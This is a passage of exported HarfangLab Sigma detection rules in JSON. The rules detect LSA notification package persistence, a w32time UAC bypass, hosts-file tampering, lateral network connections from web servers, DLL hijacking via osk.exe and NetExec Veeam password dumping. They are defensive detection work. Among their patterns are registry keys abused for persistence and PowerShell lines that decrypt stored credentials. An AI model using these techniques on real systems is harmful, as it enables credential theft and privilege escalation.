"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074177Z",
"creation_date": "2026-03-23T11:45:34.074179Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074183Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malicious.link/posts/2013/2013-09-11-stealing-passwords-every-time-they-change/",
"https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
"https://attack.mitre.org/techniques/T1556/002/"
],
"name": "t1556_002_persistence_lsa_notification_package.yml",
"content": "title: LSA Notification Package Installed\nid: e9d731c0-0173-4196-8d31-3dd430a01429\ndescription: |\n Detects the installation of a new notification package to LSA configuration.\n Attackers can register a malicious notification package as a Windows DLL that will be loaded by LSASS.\n It is recommended to investigate the DLL added in the registry details for malicious content.\nreferences:\n - https://malicious.link/posts/2013/2013-09-11-stealing-passwords-every-time-they-change/\n - https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/\n - https://attack.mitre.org/techniques/T1556/002/\ndate: 2020/09/22\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.persistence\n - attack.t1556.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Notification Packages'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n # msiexec /Y c:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmLogon.dll'\n exclusion_appsense_emlogon:\n ProcessCommandLine: '*\\Program Files\\AppSense\\Environment Manager\\Agent\\EmLogon.dll*'\n Details: '*EmLogon*'\n\n exclusion_checkpoint:\n Image: '?:\\Program Files (x86)\\CheckPoint\\Endpoint Connect\\TracSrvWrapper.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n\n exclusion_known_fp:\n Details:\n - 'scecli' # https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc963221(v=technet.10)?redirectedfrom=MSDN\n - 'rassfm;scecli;clusauthmgr'\n - 'scecli;?:\\Program Files\\ThinkPad\\Bluetooth Software\\BtwProximityCP.dll'\n - 'scecli;?:\\Program Files\\ThinkVantage Fingerprint Software\\psqlpwd.dll'\n - 'scecli;ACGina' # Access Connections Gina Module is part of ThinkVantage Access Connections, a connectivity assistant program for your ThinkPad computer\n - 'scecli;rassfm'\n - 'rassfm;scecli'\n - 'scecli;cywlx' # Cryhod by Prim'X Technologies http://www.herdprotect.com/signer-primx-technologies-4f8b10a423838554100fc80feb2f3a47.aspx\n - 'rassfm;scecli;AzureADPasswordProtectionPFD.dll' # Azure AD Password Protection filter dll\n - 'SppFilter;rassfm;scecli'\n\n exclusion_hp:\n ProcessCommandLine: 'regsvr32.exe HPPwdFilter.dll /s /u'\n Details: 'DPPassFilter;scecli'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e9d731c0-0173-4196-8d31-3dd430a01429",
"rule_name": "LSA Notification Package Installed",
"rule_description": "Detects the installation of a new notification package to LSA configuration.\nAttackers can register a malicious notification package as a Windows DLL that will be loaded by LSASS.\nIt is recommended to investigate the DLL added in the registry details for malicious content.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1556.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea37d20b-3582-4d62-9a57-ae2a80e3f4a5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092608Z",
"creation_date": "2026-03-23T11:45:34.092610Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092615Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_w32time.yml",
"content": "title: IDateTimeStateWriter COM UAC Bypass Prepared\nid: ea37d20b-3582-4d62-9a57-ae2a80e3f4a5\ndescription: |\n Detects the preparation of a UAC bypass via w32time service.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/07\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_event_type:\n EventType: SetValue\n\n selection_dll_method:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\Parameters\\ServiceDll'\n\n filter_dll_method:\n Details:\n - '%systemroot%\\system32\\w32time.dll'\n - '?:\\windows\\system32\\w32time.dll'\n\n selection_image_path_method:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\ImagePath'\n\n filter_image_path_method:\n Details: '%SystemRoot%\\system32\\svchost.exe -k LocalService'\n\n condition: selection_event_type and ((selection_dll_method and not filter_dll_method) or (selection_image_path_method and not filter_image_path_method))\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea37d20b-3582-4d62-9a57-ae2a80e3f4a5",
"rule_name": "IDateTimeStateWriter COM UAC Bypass Prepared",
"rule_description": "Detects the preparation of a UAC bypass via w32time service.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-07",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea4a20b7-8fa3-42dd-8761-60a1b0a2b1cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619798Z",
"creation_date": "2026-03-23T11:45:34.619800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619804Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/modifies_hosts_file",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_etc_hosts_windows.yml",
"content": "title: Suspicious Modification of Hosts File\nid: ea4a20b7-8fa3-42dd-8761-60a1b0a2b1cc\ndescription: |\n Detects a suspicious attempt to modify C:\\windows\\system32\\drivers\\etc\\hosts.\n This file is part of the network configuration and can be modified to falsify host resolution, redirect traffic to malicious servers, or prevent access to security-related domains.\n It is recommended to ensure that the file has been modified by a legitimate process and that the new content is not malicious.\nreferences:\n - https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/modifies_hosts_file\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/11/24\nmodified: 2026/02/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection:\n Kind: 'write'\n Path: '?:\\Windows\\System32\\drivers\\etc\\hosts'\n\n exclusion_system:\n ProcessName: 'System'\n ProcessId: '4'\n\n exclusion_gpo:\n - ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n - ProcessParentImage|endswith: '\\svchost.exe'\n ProcessParentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessParentUserSID: 'S-1-5-18'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n - ProcessGrandparentImage|endswith: '\\svchost.exe'\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessGrandparentUserSID: 'S-1-5-18'\n\n exclusion_scheduler:\n - ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n - ProcessParentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n - ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n - ProcessParentGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_legit_software:\n ProcessImage:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\Downloaded Program Files\\\\*'\n # PDQ Inventory\n - '?:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\\\*\\exec\\PDQInventoryScanner.exe'\n # Defender\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n # Herd\n - '?:\\Users\\\\*\\.config\\herd\\bin\\HerdHelper.exe'\n # Redondance IP\n - '*\\SrvRedondanceIP.exe'\n # WDHCP\n - '*\\Empower\\Instruments\\WDHCPServerSvc.exe'\n # LMS\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\lms.*\\LMS.exe'\n\n exclusion_interactive_text_editors:\n ProcessImage: '?:\\Windows\\System32\\notepad.exe'\n SessionLogonType:\n - '2' # Interactive\n - '11' # CachedInteractive\n\n exclusion_airport_reservation_system:\n ProcessCompany: 'RESA'\n ProcessOriginalFileName:\n - 'HostsFil.exe'\n - 'CrewsCupps.exe'\n\n exclusion_carbon_black:\n ProcessOriginalFileName: 'cb.exe'\n ProcessSignature: 'Carbon Black, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea4a20b7-8fa3-42dd-8761-60a1b0a2b1cc",
"rule_name": "Suspicious Modification of Hosts File",
"rule_description": "Detects a suspicious attempt to modify C:\\windows\\system32\\drivers\\etc\\hosts.\nThis file is part of the network configuration and can be modified to falsify host resolution, redirect traffic to malicious servers, or prevent access to security-related domains.\nIt is recommended to ensure that the file has been modified by a legitimate process and that the new content is not malicious.\n",
"rule_creation_date": "2025-11-24",
"rule_modified_date": "2026-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea71ee12-4cfd-47a1-9258-3e0faa2f3769",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081510Z",
"creation_date": "2026-03-23T11:45:34.081512Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081516Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/sensepost/reGeorg/tree/master",
"https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_network_connection_from_webserver_windows.yml",
"content": "title: Suspicious Network Activity from Web Server (Windows)\nid: ea71ee12-4cfd-47a1-9258-3e0faa2f3769\ndescription: |\n Detects suspicious network communications by a web server related to a possible web shell.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\n Tools like reGeorg can be used by attackers to pivot inside the compromised environment.\n It is recommended to verify the legitimacy of this network connection and check any other command executed by the web server.\nreferences:\n - https://github.com/sensepost/reGeorg/tree/master\n - https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/\n - https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2023/10/27\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.lateral_movement\n - attack.t1021\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessImage|endswith:\n - '\\w3wp.exe' # IIS\n - '\\httpd.exe' # Apache\n - '\\nginx.exe'\n - '\\php-cgi.exe'\n - '\\tomcat.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7.exe\n # C:\\Program Files\\Tomcat\\bin\\tomcat8.exe\n # C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\bin\\Tomcat9.exe\n - '\\tomcat?.exe'\n # C:\\Program Files\\Tomcat\\bin\\tomcat7w.exe\n - '\\tomcat??.exe'\n DestinationPort:\n - '22'\n - '445'\n - '3389'\n Initiated: 'true'\n\n exclusion_berger_levrault:\n ProcessImage: '?:\\CARLappl\\CSAdmin\\server\\bin\\tomcat?.exe'\n DestinationPort: '445'\n\n exclusion_netgear:\n ProcessImage: '?:\\Program Files\\NMS300\\NMS300\\apache-tomcat-*\\bin\\tomcat?.exe'\n DestinationPort:\n - '22'\n - '445'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea71ee12-4cfd-47a1-9258-3e0faa2f3769",
"rule_name": "Suspicious Network Activity from Web Server (Windows)",
"rule_description": "Detects suspicious network communications by a web server related to a possible web shell.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\nTools like reGeorg can be used by attackers to pivot inside the compromised environment.\nIt is recommended to verify the legitimacy of this network connection and check any other command executed by the web server.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ea9b1c80-b061-4116-a1ca-a492c161946d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602552Z",
"creation_date": "2026-03-23T11:45:34.602555Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602563Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_osk.yml",
"content": "title: DLL Hijacking via osk.exe\nid: ea9b1c80-b061-4116-a1ca-a492c161946d\ndescription: |\n Detects potential Windows DLL Hijacking via osk.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'osk.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUDIOSES.DLL'\n - '\\AVRT.dll'\n - '\\DEVOBJ.dll'\n - '\\dui70.dll'\n - '\\duser.dll'\n - '\\dwmapi.dll'\n - '\\ksuser.dll'\n - '\\midimap.dll'\n - '\\MMDevAPI.DLL'\n - '\\MSACM32.dll'\n - '\\OLEACC.dll'\n - '\\OskSupport.dll'\n - '\\WindowsCodecs.dll'\n - '\\winmm.dll'\n - '\\WMsgAPI.dll'\n - '\\HID.dll' # osk.exe process first looks for C:\\Program Files\\Common Files\\microsoft shared\\ink\\HID.dll, rather than its original location at C:\\Windows\\System32\\HID.dll\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ea9b1c80-b061-4116-a1ca-a492c161946d",
"rule_name": "DLL Hijacking via osk.exe",
"rule_description": "Detects potential Windows DLL Hijacking via osk.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eab58a58-82b3-49a7-b89d-65ed296ee5ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073236Z",
"creation_date": "2026-03-23T11:45:34.073238Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073242Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_mssql.ps1",
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1",
"https://attack.mitre.org/techniques/T1555/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1555_netexec_veeam_password.yml",
"content": "title: Veeam Password Dumped via NetExec\nid: eab58a58-82b3-49a7-b89d-65ed296ee5ef\ndescription: |\n Detects common PowerShell script commands used by NetExec for dumping Veeam credentials.\n Veeam is a backup solution often targeted by attackers due to its use of highly privileged accounts.\n NetExec is a tool commonly used by adversaries to facilitate lateral movement, internal reconnaissance, and credential gathering actions.\n The dumping of credentials could indicate an attempt to compromise Veeam's privileged access for further network traversal or backup destruction.\n It is recommended to investigate the actions performed by the child process to determine if they are legitimate and review authentication logs to identify the source of the remote connection.\n Additionally, consider reviewing Veeam's configuration and permissions to ensure they are secure and align with organizational policies.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_mssql.ps1\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1\n - https://attack.mitre.org/techniques/T1555/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'Add-Type -assembly System.Security'\n - '#Decrypting passwords using DPAPI'\n - '$rows | ForEach-Object -Process {'\n - '$EnryptedPWD = [Convert]::FromBase64String($_.password)'\n - '$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )'\n - '$enc = [system.text.encoding]::Default'\n - '$_.password = $enc.GetString($ClearPWD)'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eab58a58-82b3-49a7-b89d-65ed296ee5ef",
"rule_name": "Veeam Password Dumped via NetExec",
"rule_description": "Detects common PowerShell script commands used by NetExec for dumping Veeam credentials.\nVeeam is a backup solution often targeted by attackers due to its use of highly privileged accounts.\nNetExec is a tool commonly used by adversaries to facilitate lateral movement, internal reconnaissance, and credential gathering actions.\nThe dumping of credentials could indicate an attempt to compromise Veeam's privileged access for further network traversal or backup destruction.\nIt is recommended to investigate the actions performed by the child process to determine if they are legitimate and review authentication logs to identify the source of the remote connection.\nAdditionally, consider reviewing Veeam's configuration and permissions to ensure they are secure and align with organizational policies.\n",
